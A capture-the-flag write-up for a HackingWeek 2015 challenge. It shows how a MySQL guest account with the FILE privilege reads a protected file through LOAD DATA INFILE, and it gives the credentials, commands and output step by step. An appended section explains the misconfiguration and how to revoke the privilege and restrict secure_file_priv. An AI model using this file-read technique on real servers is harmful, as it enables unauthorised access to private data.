[HackingWeek 2015] [Exploit4] Write Up

Description

Log on as guest (password: shu1eKoo) on machine 37.187.22.21.
You will find the hidden validation key in /home/exploit04/.secret.

$> ssh guest@37.187.22.21

Resolution

This challenge is not especially difficult: as with exploit03, there is a small trick to find, but it was still fun to work out the solution 🙂 As we can see, there are a few files in the directory:

guest@ns314076:/home/exploit04/project$ ls -la
total 198332
dr-xr-xr-x 4 exploit04 exploit04 4096 May 12 12:48 .
dr-xr-xr-x 3 exploit04 exploit04 4096 Apr 30 17:59 ..
-r--r--r-- 1 exploit04 exploit04 598 Apr 30 17:22 Makefile
dr-xr-xr-x 13 exploit04 exploit04 4096 Apr 30 18:02 mysql-5.5.19-linux2.6-i686
-r--r--r-- 1 exploit04 exploit04 178764831 Apr 30 17:15 mysql-5.5.19-linux2.6-i686.tar.gz
-r--r--r-- 1 exploit04 exploit04 24296942 Apr 30 17:15 mysql-5.5.19.tar.gz
drwxr-xr-x 5 exploit04 exploit04 4096 May 19 16:33 mysql-db
-r--r--r-- 1 exploit04 exploit04 314 Apr 30 17:15 mysqld.cnf
-r--r--r-- 1 exploit04 exploit04 137 Apr 30 17:33 NOTES.txt

NOTES.txt gives us a guest account:

guest@ns314076:/home/exploit04/project$ cat NOTES.txt
Testing a MySQL server 5.5.19

Test user
 - login = guest
 - password = guest

$> mysql --host=localhost --user=guest --password=guest

We can think of a few ways this might give us access to the flag file:

  • Any public exploit in the 5.5.19 version of mysql
  • Some weaknesses in the configuration file
  • Bad access rights with the mysql guest user

In order to check each of these, I began by connecting to the MySQL service with the given credentials:

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)

Nothing weird here. The main question is how to get the contents of a file through MySQL. MySQL can easily take a file as input and load its contents into a table with the LOAD DATA INFILE statement (https://dev.mysql.com/doc/refman/5.1/en/load-data.html). So why not check whether the guest account has the right to do this 😉

mysql> create database test;
Query OK, 1 row affected (0.02 sec)
mysql> create table test (data VARCHAR(50));
Query OK, 0 rows affected (0.09 sec)
mysql> load data infile '/home/exploit04/.secret' INTO table test;
Query OK, 1 row affected (0.08 sec)
Records: 1 Deleted: 0 Skipped: 0 Warnings: 0

mysql> select * from test;
+------------+
| data |
+------------+
| xaeVu9oot1 |
+------------+
1 row in set (0.00 sec)

And… P-P-P-PWNED! The flag is xaeVu9oot1
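Why the statement above worked, and the checks and hardening an admin of this MySQL 5.5 box would apply, as an added example that is not part of the original write-up: the account name 'guest'@'localhost' and the mysqld.cnf file come from the page, while the exact grants on the CTF machine and the /var/lib/mysql-files directory are assumptions.

```sql
-- 1. Why LOAD DATA INFILE could read /home/exploit04/.secret:
--    the server-side form (no LOCAL keyword) needs the global FILE
--    privilege, and the file is opened as the OS user running mysqld,
--    so every file that user can read is exposed to the SQL account.
--    Check what the test account was actually granted:
SHOW GRANTS FOR 'guest'@'localhost';
--    A line such as
--      GRANT FILE ON *.* TO 'guest'@'localhost'
--    (or GRANT ALL PRIVILEGES ON *.*) is the over-privilege to look for.

-- 2. Is the server fencing file I/O to one directory?
--    An empty value means "no restriction", which is the 5.5 default.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 3. Hardening, part one: take FILE away from the test account.
--    GRANT/REVOKE take effect immediately; no FLUSH PRIVILEGES needed.
REVOKE FILE ON *.* FROM 'guest'@'localhost';

--    Hardening, part two: pin server-side file access to a dedicated
--    directory. secure_file_priv cannot be changed at runtime, so it
--    goes in the [mysqld] section of mysqld.cnf and needs a restart
--    (the directory below is an assumed path):
--      [mysqld]
--      secure_file_priv = /var/lib/mysql-files

-- 4. Verify: re-running the write-up's own statement must now be
--    refused instead of importing the file. Without FILE the server
--    answers ERROR 1045 "Access denied for user 'guest'@'localhost'";
--    with secure_file_priv set and the path outside that directory it
--    answers ERROR 1290 "... running with the --secure-file-priv option".
LOAD DATA INFILE '/home/exploit04/.secret' INTO TABLE test;
```

The same two checks (SHOW GRANTS for FILE, and secure_file_priv) are worth running for every low-privilege account on a shared MySQL server, not just the one named in NOTES.txt.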

Enjoy

The lsd
